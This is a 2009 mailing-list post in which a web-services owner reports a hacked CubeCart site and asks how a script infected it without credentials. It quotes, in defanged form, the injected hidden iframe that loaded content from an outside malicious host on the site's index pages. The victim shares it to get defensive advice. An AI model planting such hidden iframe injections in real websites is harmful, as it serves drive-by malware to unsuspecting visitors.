[thelist] Server hacked?

Sales @ Lycosa sales at lycosa.co.uk
Fri Jul 10 04:42:17 CDT 2009

Hi, I just had a scary moment, and I thought my server had been compromised.
It turns out that just one site had been compromised, with the injection of
the following code into all the index pages within each directory of the
site. (I have added spaces to prevent the link delivering its payload).


i_f_r_a_m_e  s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 "
width=125 height=125 style="visibility: hidden"


The site runs cube cart, and I suspect a Trojan was somehow added to the
review pages of the site. No passwords were altered, so I am assuming this
is the work of a script. I take the security of my servers very seriously,
and I take steps to maintain their integrity, but this is a new one for me.
Also, according to my customer, his site has been listed as dangerous with


My question is this: how did a script infect my server without a
username/password, and how do I prevent this happening again?


[ I have researched Google, and sent a support ticket to my hosting company,
but nothing yet ]




Phil Parker



Kind regards,

Phil Parker

Lycosa Web Services Ltd, 
47 Hilderthorpe Road,
East Yorkshire.
YO15 3AZ.

Tel: 01262 42 42 99
Email:  <mailto:sales at lycosa.co.uk> sales at lycosa.co.uk
Web:  <http://www.lycosa.co.uk> http://www.lycosa.co.uk

Registered in England and Wales company no. 04614248
Disclaimer: The information in this email is confidential and is intended
solely for the use of the addressee. If you are not the intended recipient
of this email you have received it in error and any disclosure, copying or
distribution is strictly prohibited.
Any quotation or estimate is valid for 30 days from the date of this email.

E. & O. E.


More information about the thelist mailing list